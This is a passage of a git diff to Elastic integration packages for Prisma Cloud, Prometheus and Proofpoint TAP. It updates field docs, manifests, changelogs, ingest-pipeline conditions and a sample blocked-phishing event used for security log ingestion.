prisma_cloud.host.compliance_issues.data.status | Vendor status for the vulnerability. | keyword | +| prisma_cloud.host.compliance_issues.data.templates | List of templates with which the vulnerability is associated. | keyword | | prisma_cloud.host.compliance_issues.data.text | Description of the violation. | keyword | | prisma_cloud.host.compliance_issues.data.title | Compliance title. | keyword | | prisma_cloud.host.compliance_issues.data.twistlock | Indicates if this is a Twistlock-specific vulnerability (true) or not (false). | boolean | @@ -1280,9 +1278,9 @@ An example event for `host` looks as following: | prisma_cloud.host.compliance_issues.data.vuln_tag_infos.color | Color is a hexadecimal representation of color code value. | keyword | | prisma_cloud.host.compliance_issues.data.vuln_tag_infos.comment | Tag comment in a specific vulnerability context. | keyword | | prisma_cloud.host.compliance_issues.data.vuln_tag_infos.name | Name of the tag. | keyword | -| prisma_cloud.host.compliance_issues.data.wildfire_malware.md5 | MD5 is the hash of the malicious binary. | keyword | -| prisma_cloud.host.compliance_issues.data.wildfire_malware.path | Path is the path to malicious binary. | keyword | -| prisma_cloud.host.compliance_issues.data.wildfire_malware.verdict | Verdict is the malicious source like grayware, malware and phishing. | keyword | +| prisma_cloud.host.compliance_issues.data.wild_fire_malware.md5 | MD5 is the hash of the malicious binary. | keyword | +| prisma_cloud.host.compliance_issues.data.wild_fire_malware.path | Path is the path to malicious binary. | keyword | +| prisma_cloud.host.compliance_issues.data.wild_fire_malware.verdict | Verdict is the malicious source like grayware, malware and phishing. | keyword | | prisma_cloud.host.compliance_risk_score | Compliance risk score for the image. | float | | prisma_cloud.host.creation_time | Specifies the time of creation for the latest version of the image. | date | | prisma_cloud.host.devices.ip | Network device IPv4 address. | ip | @@ -1369,7 +1367,7 @@ An example event for `host` looks as following: | prisma_cloud.host.image.history.size_bytes | Size of the layer (in bytes). | long | | prisma_cloud.host.image.history.tags | Holds the image tags. | keyword | | prisma_cloud.host.image.history.vulnerabilities.applicable_rules | Rules applied on the package. | keyword | -| prisma_cloud.host.image.history.vulnerabilities.binaryPkgs | Names of the distro binary package names (packages which are built from the source of the package). | keyword | +| prisma_cloud.host.image.history.vulnerabilities.binary_pkgs | Names of the distro binary package names (packages which are built from the source of the package). | keyword | | prisma_cloud.host.image.history.vulnerabilities.block | Indicates if the vulnerability has a block effect (true) or not (false). | boolean | | prisma_cloud.host.image.history.vulnerabilities.cause | Additional information regarding the root cause for the vulnerability. | keyword | | prisma_cloud.host.image.history.vulnerabilities.cri | Indicates if this is a CRI-specific vulnerability (true) or not (false). | boolean | @@ -1541,6 +1539,7 @@ An example event for `host` looks as following: | prisma_cloud.host.vulnerabilities.data.discovered | Specifies the time of discovery for the vulnerability. | date | | prisma_cloud.host.vulnerabilities.data.exploit | ExploitType represents the source of an exploit. | keyword | | prisma_cloud.host.vulnerabilities.data.exploits.kind | ExploitKind represents the kind of the exploit. | keyword | +| prisma_cloud.host.vulnerabilities.data.exploits.link | Link is a link to information about the exploit. | keyword | | prisma_cloud.host.vulnerabilities.data.exploits.source | ExploitType represents the source of an exploit. | keyword | | prisma_cloud.host.vulnerabilities.data.fix_date | Date/time when the vulnerability was fixed (in Unix time). | date | | prisma_cloud.host.vulnerabilities.data.fix_link | Link to the vendor's fixed-version information. | keyword | diff --git a/packages/prisma_cloud/manifest.yml b/packages/prisma_cloud/manifest.yml index 44773c14c48..24862149bf3 100644 --- a/packages/prisma_cloud/manifest.yml +++ b/packages/prisma_cloud/manifest.yml @@ -1,14 +1,17 @@ -format_version: 2.8.0 +format_version: 3.0.3 name: prisma_cloud title: "Palo Alto Prisma Cloud" -version: "1.0.1" +version: "1.2.0" description: "Collect logs from Prisma Cloud with Elastic Agent." type: integration categories: - security + - cloudsecurity_cdr conditions: - kibana.version: "^8.10.1" - elastic.subscription: "basic" + kibana: + version: "^8.12.0" + elastic: + subscription: "basic" screenshots: - src: /img/prisma_cloud-alert-dashboard.png title: Prisma Cloud Alert Dashboard Screenshot @@ -58,6 +61,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL @@ -132,3 +136,4 @@ policy_templates: description: Collecting logs from Prisma Cloud instance via UDP input. owner: github: elastic/security-service-integrations + type: elastic diff --git a/packages/prisma_cloud/validation.yml b/packages/prisma_cloud/validation.yml new file mode 100644 index 00000000000..ddfb73e9384 --- /dev/null +++ b/packages/prisma_cloud/validation.yml @@ -0,0 +1,4 @@ +errors: + exclude_checks: + - SVR00002 # Mandatory filters in dashboards. + - SVR00004 # References in dashboards. diff --git a/packages/prometheus/_dev/build/docs/README.md b/packages/prometheus/_dev/build/docs/README.md index 1c579091524..75c1588f548 100644 --- a/packages/prometheus/_dev/build/docs/README.md +++ b/packages/prometheus/_dev/build/docs/README.md @@ -1,9 +1,9 @@ # Prometheus Integration This integration can collect metrics from: -- [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) -- [Prometheus Server Remote-Write](#prometheus-server-remote-write) -- [Prometheus Queries (PromQL)](#prometheus-queries-promql) + - [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) + - [Prometheus Server Remote-Write](#prometheus-server-remote-write) + - [Prometheus Queries (PromQL)](#prometheus-queries-promql) ## Metrics @@ -241,6 +241,10 @@ types, including {{ url "elasticsearch-histograms" "histograms" }}. the counter increment since the last collection. This metric should make some aggregations easier and with better performance. This parameter can only be enabled in combination with `use_types`. +`period` parameter (default: 60s) configures the timeout of internal cache, which stores counter values in order to calculate rates between consecutive fetches. The parameter will be validated and all values lower than 60sec will be reset to the default value. + +Note that by default prometheus pushes data with the interval of 60s (in remote write). In case that prometheus push rate is changed, the `period` parameter needs to be configured accordingly. + When `use_types` and `rate_counters` are enabled, metrics are stored like this: ```json diff --git a/packages/prometheus/changelog.yml b/packages/prometheus/changelog.yml index 1b83ac71ae9..b674dae62bb 100644 --- a/packages/prometheus/changelog.yml +++ b/packages/prometheus/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.15.1" + changes: + - description: Add a "period" parameter to the counter cache. + type: bugfix + link: https://github.com/elastic/integrations/pull/9424 +- version: "1.15.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.14.2" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.14.1" + changes: + - description: Add Certificate Authorities for Remote Write + type: enhancement + link: https://github.com/elastic/integrations/pull/9264 +- version: "1.14.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.13.1" changes: - description: Migrate Prometheus Server Overview dashboard to lens. diff --git a/packages/prometheus/data_stream/collector/manifest.yml b/packages/prometheus/data_stream/collector/manifest.yml index 4a1b96efb49..00521e90033 100644 --- a/packages/prometheus/data_stream/collector/manifest.yml +++ b/packages/prometheus/data_stream/collector/manifest.yml @@ -61,6 +61,7 @@ streams: title: 'HTTP config options: bearer_token_file' description: If defined, the contents of the file will be read once at initialization and then the value will be used in an HTTP Authorization header. multi: false + secret: false required: false show_user: false - name: ssl.certificate_authorities @@ -93,12 +94,12 @@ streams: default: user - name: password type: password + secret: true title: 'HTTP config options: Password' description: The password to use for basic authentication. multi: false required: false show_user: false - default: secret - name: connect_timeout type: text title: 'HTTP config options: connect_timeout' diff --git a/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs b/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs index 91f45cf8384..9c85cfa1340 100644 --- a/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs +++ b/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs @@ -4,6 +4,13 @@ port: {{port}} ssl.enabled: {{ssl.enabled}} ssl.certificate: {{ssl.certificate}} ssl.key: {{ssl.key}} +{{#if ssl.certificate_authorities}} +ssl.certificate_authorities: +{{#each ssl.certificate_authorities}} + - {{this}} +{{/each}} +{{/if}} +period: {{period}} rate_counters: {{rate_counters}} use_types: {{use_types}} types_patterns.exclude: @@ -19,4 +26,4 @@ data_stream: {{#if processors}} processors: {{processors}} -{{/if}} \ No newline at end of file +{{/if}} diff --git a/packages/prometheus/data_stream/remote_write/manifest.yml b/packages/prometheus/data_stream/remote_write/manifest.yml index b8e640620ed..066b8e74950 100644 --- a/packages/prometheus/data_stream/remote_write/manifest.yml +++ b/packages/prometheus/data_stream/remote_write/manifest.yml @@ -40,6 +40,20 @@ streams: required: false show_user: false default: /etc/pki/server/cert.key + - name: ssl.certificate_authorities + type: text + title: SSL Certificate Authorities + multi: true + required: false + show_user: false + - name: period + type: text + title: Period + description: This is the timeout period for the counter cache, which is used to calculate counter rates. + multi: false + required: true + show_user: false + default: 1m - name: rate_counters type: bool title: Rate Counters diff --git a/packages/prometheus/docs/README.md b/packages/prometheus/docs/README.md index a26b9bdffc4..c0483e0c695 100644 --- a/packages/prometheus/docs/README.md +++ b/packages/prometheus/docs/README.md @@ -1,9 +1,9 @@ # Prometheus Integration This integration can collect metrics from: -- [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) -- [Prometheus Server Remote-Write](#prometheus-server-remote-write) -- [Prometheus Queries (PromQL)](#prometheus-queries-promql) + - [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) + - [Prometheus Server Remote-Write](#prometheus-server-remote-write) + - [Prometheus Queries (PromQL)](#prometheus-queries-promql) ## Metrics @@ -453,6 +453,10 @@ types, including [histograms](https://www.elastic.co/guide/en/elasticsearch/refe the counter increment since the last collection. This metric should make some aggregations easier and with better performance. This parameter can only be enabled in combination with `use_types`. +`period` parameter (default: 60s) configures the timeout of internal cache, which stores counter values in order to calculate rates between consecutive fetches. The parameter will be validated and all values lower than 60sec will be reset to the default value. + +Note that by default prometheus pushes data with the interval of 60s (in remote write). In case that prometheus push rate is changed, the `period` parameter needs to be configured accordingly. + When `use_types` and `rate_counters` are enabled, metrics are stored like this: ```json diff --git a/packages/prometheus/manifest.yml b/packages/prometheus/manifest.yml index d541d18e1c3..aa00925a2b2 100644 --- a/packages/prometheus/manifest.yml +++ b/packages/prometheus/manifest.yml @@ -1,7 +1,7 @@ format_version: 2.10.0 name: prometheus title: Prometheus -version: 1.13.1 +version: 1.15.1 description: Collect metrics from Prometheus servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - monitoring - containers conditions: - kibana.version: "^8.9.0" + kibana.version: "^8.12.1" screenshots: - src: /img/prometheus-server-overview.png title: Metricbeat Prometheus Overview diff --git a/packages/prometheus_input/changelog.yml b/packages/prometheus_input/changelog.yml index 2edc4297b08..712a7c71cda 100644 --- a/packages/prometheus_input/changelog.yml +++ b/packages/prometheus_input/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: 0.4.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 0.3.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 0.3.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 0.2.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/prometheus_input/manifest.yml b/packages/prometheus_input/manifest.yml index 910d4a080a3..240f0b6ff94 100644 --- a/packages/prometheus_input/manifest.yml +++ b/packages/prometheus_input/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: prometheus_input title: "Prometheus Input" -version: "0.2.0" +version: "0.4.0" description: "Collects metrics from Prometheus exporter." type: input categories: @@ -10,7 +10,7 @@ categories: - custom conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: "basic" icons: @@ -84,6 +84,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: true diff --git a/packages/proofpoint_tap/changelog.yml b/packages/proofpoint_tap/changelog.yml index b37289ddc7d..94453665d7e 100644 --- a/packages/proofpoint_tap/changelog.yml +++ b/packages/proofpoint_tap/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9518 +- version: "1.17.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.16.3" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9153 - version: "1.16.2" changes: - description: Add error.message ECS field mapping. diff --git a/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml index 60246eba217..31db4da5fe1 100644 --- a/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml @@ -182,7 +182,7 @@ processors: ignore_failure: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml index 672d3848268..56f4a473b2a 100644 --- a/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml @@ -182,7 +182,7 @@ processors: ignore_failure: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml index fb3ecb55ef7..5d9df85f691 100644 --- a/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml @@ -99,7 +99,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - foreach: field: json.messageParts processor: @@ -109,7 +109,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - rename: field: json.ccAddresses target_field: email.cc.address @@ -168,7 +168,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.recipient != null && ctx.json.recipient instanceof List + if: ctx.json?.recipient instanceof List - rename: field: json.xmailer target_field: email.x_mailer @@ -191,7 +191,7 @@ processors: - _ingest._value.sandboxStatus ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -200,7 +200,7 @@ processors: target_field: _ingest._value.file.mime_type ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -209,7 +209,7 @@ processors: target_field: _ingest._value.file.hash.md5 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -218,7 +218,7 @@ processors: target_field: _ingest._value.file.hash.sha256 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -227,14 +227,14 @@ processors: target_field: _ingest._value.file.name ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - script: description: Adding hash in related.hash from artifact field. lang: painless ignore_failure: true source: | if (ctx.json?.threatsInfoMap instanceof List) { - for (artifact in ctx.json?.threatsInfoMap) { + for (artifact in ctx.json.threatsInfoMap) { def flag = true; def str = artifact.threat.toLowerCase(); if (str?.length() == 64) { @@ -331,7 +331,7 @@ processors: - _ingest._value.sha256 ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.message_parts != null && ctx.proofpoint_tap.message_blocked.message_parts instanceof List + if: ctx.proofpoint_tap?.message_blocked?.message_parts instanceof List - foreach: field: proofpoint_tap.message_blocked.message_parts processor: @@ -340,7 +340,7 @@ processors: target_field: _ingest._value.o_content_type ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.message_parts != null && ctx.proofpoint_tap.message_blocked.message_parts instanceof List + if: ctx.proofpoint_tap?.message_blocked?.message_parts instanceof List - foreach: field: proofpoint_tap.message_blocked.message_parts processor: @@ -349,7 +349,7 @@ processors: target_field: _ingest._value.sandbox_status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.message_parts != null && ctx.proofpoint_tap.message_blocked.message_parts instanceof List + if: ctx.proofpoint_tap?.message_blocked?.message_parts instanceof List - convert: field: json.messageSize target_field: proofpoint_tap.message_blocked.message_size @@ -415,7 +415,7 @@ processors: target_field: _ingest._value.campaign_id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -424,7 +424,7 @@ processors: target_field: _ingest._value.threat.artifact ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -433,7 +433,16 @@ processors: target_field: _ingest._value.threat.id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List + - foreach: + field: proofpoint_tap.message_blocked.threat_info_map + processor: + rename: + field: _ingest._value.threatId + target_field: _ingest._value.threat.id + ignore_missing: true + ignore_failure: true + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -442,7 +451,7 @@ processors: target_field: _ingest._value.threat.status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -453,7 +462,7 @@ processors: formats: - ISO8601 ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -461,7 +470,7 @@ processors: field: _ingest._value.threatTime ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -470,7 +479,7 @@ processors: target_field: _ingest._value.threat.type ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -479,10 +488,10 @@ processors: target_field: _ingest._value.threat.url ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml b/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml index 06421df3981..0bdb1f5ebba 100644 --- a/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml +++ b/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml @@ -6,6 +6,8 @@ name: email.attachments.file.hash.md5 - external: ecs name: email.attachments.file.hash.sha256 +- external: ecs + name: email.attachments.file.mime_type - external: ecs name: email.attachments.file.name - external: ecs diff --git a/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json b/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json index 180d6171d8e..e3ab5d769ee 100644 --- a/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json +++ b/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-11-25T09:10:00.050Z", "agent": { - "ephemeral_id": "c84bcbe5-ed0f-4c89-a9c4-8b21738f93d2", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "2738078c-875f-4284-984f-5858cbba75c9", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "data_stream": { "dataset": "proofpoint_tap.message_blocked", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "email": { "attachments": [ @@ -75,9 +75,9 @@ "category": [ "email" ], - "created": "2023-09-22T17:33:59.847Z", + "created": "2024-04-03T23:27:42.516Z", "dataset": "proofpoint_tap.message_blocked", - "ingested": "2023-09-22T17:34:02Z", + "ingested": "2024-04-03T23:27:46Z", "kind": "event", "original": "{\"GUID\":\"x11xxxx1-12f9-111x-x12x-1x1x123456xx\",\"QID\":\"x2XXxXXX111111\",\"ccAddresses\":[\"abc@example.com\"],\"clusterId\":\"pharmtech_hosted\",\"completelyRewritten\":\"true\",\"fromAddress\":\"abc@example.com\",\"headerCC\":\"\\\"Example Abc\\\" \\u003cabc@example.com\\u003e\",\"headerFrom\":\"\\\"A. Bc\\\" \\u003cabc@example.com\\u003e\",\"headerReplyTo\":null,\"headerTo\":\"\\\"Aa Bb\\\" \\u003caa.bb@example.com\\u003e; \\\"Hey Hello\\\" \\u003chey.hello@example.com\\u003e\",\"impostorScore\":0,\"malwareScore\":100,\"messageID\":\"12345678912345.12345.mail@example.com\",\"messageParts\":[{\"contentType\":\"text/plain\",\"disposition\":\"inline\",\"filename\":\"text.txt\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"text/plain\",\"sandboxStatus\":\"unsupported\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"},{\"contentType\":\"application/pdf\",\"disposition\":\"attached\",\"filename\":\"text.pdf\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"application/pdf\",\"sandboxStatus\":\"threat\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"}],\"messageTime\":\"2021-11-25T09:10:00.050Z\",\"modulesRun\":[\"pdr\",\"sandbox\",\"spam\",\"urldefense\"],\"phishScore\":46,\"policyRoutes\":[\"default_inbound\",\"executives\"],\"quarantineFolder\":\"Attachment Defense\",\"quarantineRule\":\"module.sandbox.threat\",\"recipient\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"replyToAddress\":null,\"sender\":\"x99x7x5580193x6x51x597xx2x0210@example.com\",\"senderIP\":\"175.16.199.1\",\"spamScore\":4,\"subject\":\"Please find a totally safe invoice attached.\",\"threatsInfoMap\":[{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\",\"threatId\":\"2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx\",\"threatStatus\":\"active\",\"threatTime\":\"2021-11-25T09:10:00.050Z\",\"threatType\":\"ATTACHMENT\",\"threatUrl\":\"https://www.example.com/?name=john\"},{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"example.com\",\"threatId\":\"3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx\",\"threatTime\":\"2021-07-20T05:00:00.050Z\",\"threatType\":\"URL\",\"threatUrl\":\"https://www.example.com/?name=john\"}],\"toAddresses\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"xmailer\":\"Spambot v2.5\"}", "type": [ @@ -137,23 +137,23 @@ "classification": "MALWARE", "threat": { "artifact": "a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e", + "id": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx", "status": "active", "time": "2021-11-25T09:10:00.050Z", "type": "ATTACHMENT", "url": "https://www.example.com/?name=john" - }, - "threatId": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx" + } }, { "campaign_id": "46x01x8x-x899-404x-xxx9-111xx393d1x7", "classification": "MALWARE", "threat": { "artifact": "example.com", + "id": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx", "time": "2021-07-20T05:00:00.050Z", "type": "URL", "url": "https://www.example.com/?name=john" - }, - "threatId": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx" + } } ], "to_addresses": [ @@ -191,4 +191,4 @@ "forwarded", "proofpoint_tap-message_blocked" ] -} +} \ No newline at end of file diff --git a/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml index 685248d5a9d..c48afc6ce29 100644 --- a/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml @@ -95,7 +95,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - foreach: field: json.messageParts processor: @@ -105,7 +105,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - rename: field: json.ccAddresses target_field: email.cc.address @@ -164,7 +164,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.recipient != null && ctx.json.recipient instanceof List + if: ctx.json?.recipient instanceof List - rename: field: json.xmailer target_field: email.x_mailer @@ -187,7 +187,7 @@ processors: - _ingest._value.sandboxStatus ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -196,7 +196,7 @@ processors: target_field: _ingest._value.file.mime_type ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -205,7 +205,7 @@ processors: target_field: _ingest._value.file.hash.md5 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -214,7 +214,7 @@ processors: target_field: _ingest._value.file.hash.sha256 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -223,14 +223,14 @@ processors: target_field: _ingest._value.file.name ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - script: description: Adding hash in related.hash from artifact field. lang: painless ignore_failure: true source: | if (ctx.json?.threatsInfoMap instanceof List) { - for (artifact in ctx.json?.threatsInfoMap) { + for (artifact in ctx.json.threatsInfoMap) { def flag = true; def str = artifact.threat.toLowerCase(); if (str?.length() == 64) { @@ -319,7 +319,7 @@ processors: - _ingest._value.sha256 ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.message_parts != null && ctx.proofpoint_tap.message_delivered.message_parts instanceof List + if: ctx.proofpoint_tap?.message_delivered?.message_parts instanceof List - foreach: field: proofpoint_tap.message_delivered.message_parts processor: @@ -328,7 +328,7 @@ processors: target_field: _ingest._value.o_content_type ignore_missing: true ignore_failure: true - if: 